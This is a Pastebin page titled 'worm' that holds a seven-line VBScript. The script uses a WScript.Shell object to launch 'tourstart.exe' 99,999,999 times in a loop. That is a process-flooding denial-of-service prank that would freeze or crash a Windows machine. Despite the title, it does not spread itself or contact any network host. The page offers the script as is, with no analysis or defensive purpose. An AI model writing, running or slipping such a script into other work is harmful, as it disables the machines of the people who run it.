Advertisement
isname

worm

Jan 18th, 2017
93
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.15 KB | None | 0 0
  1. option explicit
  2. dim wshshell
  3. set wshshell=wscript.createobject(“wscript.shell”)
  4. dim x
  5. for x = 1 to 99999999
  6. wshshell.run “tourstart.exe”
  7. next
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement